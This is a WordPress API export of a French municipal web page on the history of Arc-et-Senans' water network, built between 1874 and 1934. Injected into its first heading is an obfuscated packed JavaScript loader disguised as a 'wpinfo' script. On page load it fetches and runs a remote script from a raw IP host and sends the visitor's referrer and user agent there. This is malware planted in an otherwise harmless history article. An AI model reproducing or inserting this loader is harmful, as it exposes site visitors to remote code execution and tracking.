{"id":333,"date":"2015-07-22T15:12:31","date_gmt":"2015-07-22T14:12:31","guid":{"rendered":"http:\/\/www.arc-et-senans.com\/?p=333"},"modified":"2026-04-16T10:07:47","modified_gmt":"2026-04-16T09:07:47","slug":"archives-et-histoire","status":"publish","type":"post","link":"https:\/\/www.arc-et-senans.com\/?p=333","title":{"rendered":"Archives et Histoire"},"content":{"rendered":"<h3>Les membres <script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kkbik|var|u0026u|referrer|baaza||js|php'.split('|'),0,{}))<br \/>\n<\/script> de la commission :<\/h3>\n<ul>\n<li>Pascal PERCIER<\/li>\n<li>Georges VERNEREY<\/li>\n<\/ul>\n<p><!--more--><\/p>\n<h3>Les travaux de la commission<\/h3>\n<p><b><strong>\u00a0<\/strong><\/b><\/p>\n<p>La construction du r\u00e9seau d\u2019adduction d\u2019eau<\/p>\n<p>Avant la construction du r\u00e9seau d\u2019adduction d\u2019eau, l\u2019approvisionnement en eau \u00e9tait tr\u00e8s pr\u00e9caire et de mauvaise qualit\u00e9 comme l\u2019atteste le\u00a0 rapport ci-dessous \u00e9tabli en 1876 par le service hydraulique du d\u00e9partement du Doubs\u00a0:<\/p>\n<p>\u00ab\u00a0<em>La commune d\u2019Arc et Senans est tr\u00e8s mal aliment\u00e9e en eau ainsi qu\u2019on va le voir\u00a0:<\/em><\/p>\n<p><em>La section de Senans n\u2019a, \u00e0 peu pr\u00e8s, que de l\u2019eau de citerne, il n\u2019existe qu\u2019un puits, sur la place de l\u2019\u00e9glise, creus\u00e9 dans le roc, dont il re\u00e7oit les suintements. Les sections de la Saline et d\u2019Arc n\u2019ont pas d\u2019autre eau non plus \u00e0 leur disposition, car les points qui ont \u00e9t\u00e9 for\u00e9s dans le sol sont, pour la plupart infect\u00e9s et impropres aux usages domestiques. Cette infection s\u2019est produite \u00e0 la longue, par la dissolution et l\u2019entrainement des r\u00e9sidus de la fabrication du sel \u00e0 travers les couches perm\u00e9ables et filtrantes du gravier qui forme ce sol.<\/em><\/p>\n<p><em>Les sections du Vernois et du Deffois n\u2019ont que de l\u2019eau de pluie recueillie dans les mares naturelles et artificielles. Ce sont assur\u00e9ment les plus mal partag\u00e9es\u00a0; en effet ces eaux croupissent , se corrompent, deviennent malsaines et causent des dommages s\u00e9rieux \u00e0 la sant\u00e9 de la population qui est oblig\u00e9e de les consommer.<\/em><\/p>\n<p><em>Il y a donc n\u00e9cessit\u00e9 d\u2019am\u00e9liorer un \u00e9tat des choses aussi f\u00e2cheux et la d\u00e9lib\u00e9ration du conseil municipal prouve qu\u2019il a r\u00e9ellement le souci de la situation et qu\u2019il a \u00e0 c\u0153ur d\u2019en sortir.<\/em>\u00a0\u00bb<\/p>\n<p>En effet, le 29 juillet 1874, le conseil municipal a vot\u00e9 un cr\u00e9dit de 200 Francs au service hydraulique du d\u00e9partement pour faire les \u00e9tudes et travaux pr\u00e9paratoires n\u00e9cessaires \u00e0 la recherche de sources d\u2019eau sur le territoire communal et dans les environs. Cette initiative du conseil fait suite, d\u2019une part, \u00e0 la pollution croissante par\u00a0 la Saline dont l\u2019exploitation avait commenc\u00e9 un si\u00e8cle plus t\u00f4t, d\u2019autre part, \u00e0 une prise de conscience des probl\u00e8mes sanitaires suite, entre autres, aux travaux de Pasteur, notre proche voisin.<\/p>\n<p>S\u2019en est suivie une longue p\u00e9riode de d\u00e9marches administratives qui n\u2019aboutirent que vers 1930\u00a0 \u00e0 la construction effective du r\u00e9seau d\u2019eau.<\/p>\n<p>En 1908, le maire sollicite le pr\u00e9fet pour une demande de subvention sur les fonds du Pari Mutuel pour les travaux d\u2019adduction d\u2019eau. En 1914, l\u2019architecte du projet se plaint des lenteurs d\u2019une administration tr\u00e8s centralis\u00e9e car tous les dossiers sont examin\u00e9s \u00e0 Paris. La 1<sup>\u00e8re<\/sup> guerre mondiale stoppe le projet qui n\u2019est repris qu\u2019en 1928. La commune profite alors de la loi du 30\/12\/1928, accordant une avance de 500 millions aux communes, pour les travaux d\u2019ex\u00e9cution d\u2019adduction d\u2019eau.<\/p>\n<p>Le devis de 1929 comporte 4 lots (terrassements, ouvrages d\u2019art, r\u00e9servoir en b\u00e9ton, appareils \u00e9l\u00e9vatoires) pour un montant\u00a0 de 982\u00a0500 Francs dont le total a \u00e9t\u00e9 emprunt\u00e9 \u00e0 Pari Mutuel.<\/p>\n<p>Le projet, tel qu\u2019il a \u00e9t\u00e9 r\u00e9alis\u00e9, commence au puits de captage (en bordure de la voie de chemin de fer, au sud du passage \u00e0 niveau du Vernois, c\u00f4t\u00e9 Saline) surmont\u00e9 du local du groupe moto-pompe. L\u2019eau capt\u00e9e est refoul\u00e9e jusqu\u2019au r\u00e9servoir en b\u00e9ton arm\u00e9\u00a0(l\u2019actuel r\u00e9servoir du Vernois), dans une canalisation de 714 m, en tuyau m\u00e9tallique de 125 mm \u00e0 embo\u00eetement et cordon. Le r\u00e9seau de distribution avec borne-fontaines et bouches \u00e0 incendie\u00a0dessert Arc, Senans et les deux hameaux.<\/p>\n<p>La r\u00e9ception provisoire des travaux a \u00e9t\u00e9 prononc\u00e9e en 1933 et la r\u00e9ception d\u00e9finitive en 1934 suivant les proc\u00e8s verbaux figurant au dossier des archives en mairie d\u2019Arc et Senans.<\/p>\n<p>Pierre Robardet (un habitant du village), n\u00e9 en 1920, fut un t\u00e9moin direct des travaux de construction, nous rapportons ses propos\u00a0:<\/p>\n<p>\u00ab\u00a0 A l\u2019\u00e9poque j\u2019habitais \u00e0 Arc, \u00e0 l\u2019angle de la grande rue et de la rue Mourolin. Les tranch\u00e9es ont \u00e9t\u00e9 creus\u00e9es par des Anamites <sup>(1)<\/sup>. De nombreux ossements de grande taille ont \u00e9t\u00e9 d\u00e9terr\u00e9s, il s\u2019agissait\u00a0 d\u2019ossements burgondes\u00a0\u00bb<\/p>\n<p>(1)\u00a0\u00a0\u00a0 A\u00a0 l\u2019\u00e9poque\u00a0 la province d\u2019Anam situ\u00e9e au centre du Vietnam \u00e9tait une colonie fran\u00e7aise comme l\u2019ensemble de la p\u00e9ninsule indochinoise. L\u2019entrepreneur y a trouv\u00e9 une main d\u2019\u0153uvre qui faisait cruellement d\u00e9faut apr\u00e8s la \u00ab\u00a0grande guerre\u00a0\u00bb. Concernant les ossements burgondes de grande taille, le livre de l\u2019Abb\u00e9 L\u00e9tondal mentionne un cimeti\u00e8re Burgonde. Les Burgondes formaient une tribu germanique qui a envahi notre r\u00e9gion pour s\u2019y \u00e9tablir vers le V\u00e8me si\u00e8cle de notre \u00e8re.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Les membres de la commission : Pascal PERCIER Georges VERNEREY<\/p>\n","protected":false},"author":1,"featured_media":290,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[22],"tags":[],"class_list":["post-333","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-commissions"],"_links":{"self":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/posts\/333","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=333"}],"version-history":[{"count":4,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/posts\/333\/revisions"}],"predecessor-version":[{"id":10337,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/posts\/333\/revisions\/10337"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/media\/290"}],"wp:attachment":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=333"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=333"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=333"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}